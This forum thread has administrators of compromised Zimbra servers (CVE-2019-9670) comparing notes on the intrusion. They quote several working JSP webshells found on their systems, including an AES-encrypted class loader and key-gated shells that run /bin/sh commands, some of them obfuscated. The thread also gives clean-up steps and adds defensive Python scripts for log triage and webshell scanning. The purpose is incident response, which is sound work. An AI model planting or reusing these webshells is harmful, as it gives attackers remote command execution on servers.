CVE-2019-9670 being actively exploited (Hacked Server)
Re: CVE-2019-9670 being actively exploited
Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbraAdmin/public/jsp/Alert.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("Hok8gxZFafGORRLCiowY_vpqNappusQV8agmQkI7wKk")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Re: CVE-2019-9670 being actively exploited
The problem appeared again. Do you have these folders?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp
with:
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
and
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/CryptCore_jsp.java
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.class
/opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp/public_/jsp/Docs_jsp.java
@Drake, yes, the files you mentioned are infected.
Re: CVE-2019-9670 being actively exploited
I noticed that 2 days in a row at 9:18 (my local time) sed is started. It works about 10-20 seconds and after that zmswath appears and all of this.
Can this be used somehow?
Re: CVE-2019-9670 being actively exploited
Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.
Drake wrote:
Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
Re: CVE-2019-9670 being actively exploited
Help me with this plz :
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
Do you have these files at all?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
Re: CVE-2019-9670 being actively exploited
erefer thanks for the reply. Regarding the key used by the hacker, do I need to do something else than just deleting these two files?
erefer@gmail.com wrote:
Yes, it's malicious code. And your version confirms that the key used by the hacker is not fixed.
Drake wrote:
Hi guys
Can you check the following code found in the corresponding files and tell if it is malicious. To me it seems to be.
<< /opt/zimbra/jetty-distribution-9.1.5.v20140505/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("f037KfDS-uNcpGsM45mGqbjjKhqUUng7_fY2U9-85Gs")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
>>
Thank you.
With Regards
Basically, this code allows the hacker to upload an encrypted java class and to execute code in it.
Thank you in advance
With Regards
Re: CVE-2019-9670 being actively exploited
I have not.
elby wrote:
Help me with this plz :
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
Do you have these files at all?
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class
/opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java
/opt/zimbra/mailboxd/work/zimbraAdmin/ exists but is empty.
Running 8.6
Re: CVE-2019-9670 being actively exploited
Can you check the following code found in the corresponding files and tell if it is malicious.
[root@we ~]# cat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
<% if ( "nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA"
.equals( request.getParameter( "p" +
"pwd" ) ) )
{ java.io.InputStream AwDiE = Runtime.getRuntime()
.exec
( new
String[]
{
"/" + "bin/sh"
, "-c"
, request.getParameter(
"p" + "com"
) } )
.getInputStream()
; int MqP
= -1
;
byte[] NtRe
=
new
byte[ 22 ]
; out.print(
"<"
+
"pre>"
) ;
while(
( MqP = AwDiE.read( NtRe
) ) != -1 ) { out.print( new String( NtRe,
0, MqP ) ) ; }
out.print( "</" + "pre>" ) ;
} %>
Also, what is the meaning of this line:
[root@we~]# cat /opt/zimbra/log/access_log.2019-05-30 | grep pyth
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
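The log line asked about above is a POST to the Autodiscover servlet, which is the component affected by CVE-2019-9670, sent by a scripted client (python-requests) and answered with a 400. The following is an added triage helper, not code from the thread or from Zimbra: it parses access_log lines in the format shown above, flags POSTs to /Autodiscover/Autodiscover.xml and requests for JSP files under public/ paths (the mapping of webapps/zimbra/public/Ajax.jsp to the URL /public/Ajax.jsp assumes the zimbra webapp is the root context, which you should verify on your own deployment), and counts flagged source addresses. The first sample line is the one quoted in the thread; the others are constructed with documentation addresses.

```python
"""Access-log triage for the request pattern discussed in the thread.
Added example, not the thread's or Zimbra's code."""
import re
from collections import Counter

# Combined log format as shown in the thread, with a trailing request-time field.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Assumption: zimbra webapp is the root context, zimbraAdmin sits under /zimbraAdmin.
PUBLIC_JSP = re.compile(r"^(/zimbraAdmin)?/public/.*\.jsp$", re.I)
SCRIPTED_UA = re.compile(r"python-requests|curl/|Go-http-client|libwww-perl", re.I)

# First line is the thread's own; the rest are constructed samples.
SAMPLE_LOG = """\
218.103.121.116 - - [30/May/2019:00:14:20 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 400 345 "-" "python-requests/2.21.0" 5
192.0.2.10 - - [30/May/2019:00:15:02 +0000] "GET /zimbra/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0" 12
192.0.2.10 - - [30/May/2019:00:15:03 +0000] "POST /service/soap/AuthRequest HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/60.0" 40
198.51.100.7 - - [30/May/2019:00:16:44 +0000] "POST /public/Ajax.jsp HTTP/1.1" 200 88 "-" "curl/7.64.0" 3
218.103.121.116 - - [30/May/2019:00:17:01 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 200 210 "-" "python-requests/2.21.0" 7
this line is not in combined log format
"""


def parse_line(line: str):
    """Return a dict of fields for one access_log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["status"] = int(e["status"])
    e["path"] = e["path"].split("?", 1)[0]  # drop any query string before matching
    return e


def reasons(e: dict) -> list:
    """List why an entry is worth a look; empty list means it is not flagged."""
    r = []
    if e["method"] == "POST" and e["path"].lower() == "/autodiscover/autodiscover.xml":
        r.append("autodiscover-post")
    if PUBLIC_JSP.search(e["path"]):
        r.append("public-jsp")
    # A scripted user agent is only reported on top of a path hit, to limit noise.
    if r and SCRIPTED_UA.search(e["ua"]):
        r.append("scripted-client")
    return r


def triage(lines) -> list:
    """Return (ip, method, path, status, reasons) for every flagged line."""
    flagged = []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        why = reasons(e)
        if why:
            flagged.append((e["ip"], e["method"], e["path"], e["status"], why))
    return flagged


def top_sources(flagged) -> Counter:
    """Count flagged requests per source address, for blocking decisions."""
    return Counter(ip for ip, *_ in flagged)


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG.splitlines())
    for ip, method, path, status, why in hits:
        print(f"{ip} {method} {path} -> {status}  [{', '.join(why)}]")
    print(top_sources(hits).most_common())
```

Run it against the real file with `triage(open("/opt/zimbra/log/access_log.2019-05-30").readlines())`; a 400 on the Autodiscover POST means the servlet rejected that request body, so a burst of 400s followed by 200s from the same address is the pattern to escalate.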
Re: CVE-2019-9670 being actively exploited
Hi
Maybe this will help someone.
#0 - I did all steps suggested in this post and all from https://lorenzo.mile.si/zimbra-cve-2019 ... ction/961/ and I still had this problem, so I did:
#1 - find all corrupted files containing:
grep "if.*equals(" -R /opt/zimbra/mailboxd/
and remove code starting from <%if ("HASSSSHHHHH to ; } %>
example:
If the file is binary, remove a whole file.
<%
if ( "N67nqYcLWDOojFzFNvPCSAPQKg7VysUYXclEM1BZBIQ" .equals(
.....
QokFueMBi ) ) ;
} out.print(
"</p"
+ "re>"
) ; } %>
#2 - block all those IP
141.98.80.47
71.6.146.130
158.69.195.70
85.234.126.0/24
185.211.245.0/24
89.248.0.0/16
46.3.96.2
#4 - reboot the system (required to stop all connections or kill all active connections)
After this, I have almost a week without any problems.
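The clean-up steps above rely on `grep "if.*equals("`, which misses the whitespace-and-concatenation obfuscation seen in Ajax.jsp (`"p" + "pwd"` split across lines) and says nothing about the compiled .class files. The scanner below is an added example, not code from the thread or from Zimbra: it normalises that obfuscation, applies several indicators drawn from the shells posted in this thread to .jsp/.java sources, and flags .class files that carry the same strings. It only reports, never deletes. The sample files, their key (`CONSTRUCTED-KEY-...`), and the fake .class bytes are all constructed for the demo; `demo()` writes them to a temporary directory and scans it.

```python
"""Webshell indicator scanner for a Zimbra mailboxd tree.
Added example, not the thread's or Zimbra's code; reports only."""
import os
import re
import tempfile

SOURCE_EXTS = (".jsp", ".java")
BINARY_EXTS = (".class",)
CONCAT_RE = re.compile(r'"\s*\+\s*"')  # "p" + "pwd" -> "ppwd"


def normalize(src: str) -> str:
    """Join split string literals and squeeze whitespace so the obfuscated
    multi-line form matches the same rules as the minified one-line form."""
    return re.sub(r"\s+", " ", CONCAT_RE.sub("", src))


# Indicators from the thread's shells: a long random key compared against a
# request parameter, /bin/sh execution, an ad-hoc defineClass, an AES payload.
KEY = r'"[A-Za-z0-9_-]{40,}"'
SOURCE_INDICATORS = {
    "key-gated-param": re.compile(KEY + r"\s*\.\s*equals\s*\(\s*request\s*\.\s*getParameter"),
    "param-gate": re.compile(r"request\s*\.\s*getParameter\s*\(\s*" + KEY + r"\s*\)\s*!=\s*null"),
    "shell-exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\s*\("),
    "known-param-names": re.compile(r'getParameter\s*\(\s*"(ppwd|pcom)"\s*\)'),
    "class-loader": re.compile(r"\bdefineClass\s*\("),
    "aes-payload": re.compile(r'Cipher\s*\.\s*getInstance\s*\(\s*"AES"'),
}
# Compiled shells keep these strings in the class constant pool.
BINARY_MARKERS = (b"/bin/sh", b"getRuntime", b"defineClass", b"ppwd", b"pcom")


def scan_source(text: str) -> list:
    norm = normalize(text)
    return [name for name, rx in SOURCE_INDICATORS.items() if rx.search(norm)]


def scan_binary(data: bytes) -> list:
    """Two or more marker strings in a .class file is enough to pull it for review."""
    hits = [m for m in BINARY_MARKERS if m in data]
    return ["binary-suspect"] if len(hits) >= 2 else []


def scan_tree(root: str) -> dict:
    """Walk root and return {relative path: [indicators]} for flagged files only."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if name.endswith(SOURCE_EXTS):
                hits = scan_source(data.decode("utf-8", errors="replace"))
            elif name.endswith(BINARY_EXTS):
                hits = scan_binary(data)
            else:
                continue
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed samples mirroring the shapes seen in the thread; not working JSP.
CONSTRUCTED_KEY = "CONSTRUCTED-KEY-" + "0" * 27  # same 43-char shape as the real keys
SAMPLES = {
    "webapps/zimbra/public/Ajax.jsp": (
        '<% if ( "' + CONSTRUCTED_KEY + '"\n.equals( request.getParameter( "p" +\n"pwd" ) ) )\n'
        '{ java.io.InputStream s = Runtime.getRuntime()\n.exec\n( new\nString[]\n{\n'
        '"/" + "bin/sh"\n, "-c"\n, request.getParameter(\n"p" + "com"\n) } )\n.getInputStream() ; /* ... */ } %>\n'
    ),
    "webapps/zimbra/js/zimbra/csfe/XZimbra.jsp": (
        '<%!class U extends ClassLoader{public Class g(byte[] b){return super.defineClass(b,0,b.length);}}%>'
        '<%if(request.getParameter("' + CONSTRUCTED_KEY + '")!=null){/* ... */return;}'
        'Cipher c=Cipher.getInstance("AES");/* ... */%>\n'
    ),
    "webapps/zimbra/public/Legit.jsp": (
        '<% String who = request.getParameter("name");\nif ("admin".equals(who)) { out.print("hello"); } %>\n'
    ),
}
# Constructed stand-in for a compiled shell: class-file magic plus constant-pool style strings.
BINARY_SAMPLE = b"\xca\xfe\xba\xbe\x00\x00\x00\x34\x01\x00\x07/bin/sh\x01\x00\x04ppwd\x01\x00\x0agetRuntime"


def demo() -> dict:
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in SAMPLES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(text)
        bin_path = os.path.join(root, "work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class")
        os.makedirs(os.path.dirname(bin_path), exist_ok=True)
        with open(bin_path, "wb") as fh:
            fh.write(BINARY_SAMPLE)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Against a live server, call `scan_tree("/opt/zimbra/mailboxd")` and `scan_tree("/opt/zimbra/jetty-distribution-9.1.5.v20140505")` as the zimbra user, review each hit before removing it, and rerun after the reboot step to confirm nothing has been re-dropped.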
Re: CVE-2019-9670 being actively exploited
Hi everyone
I think it is also worth paying attention to this article:
( https://blog.tint0.com/2019/03/a-saga-o ... html#href1 )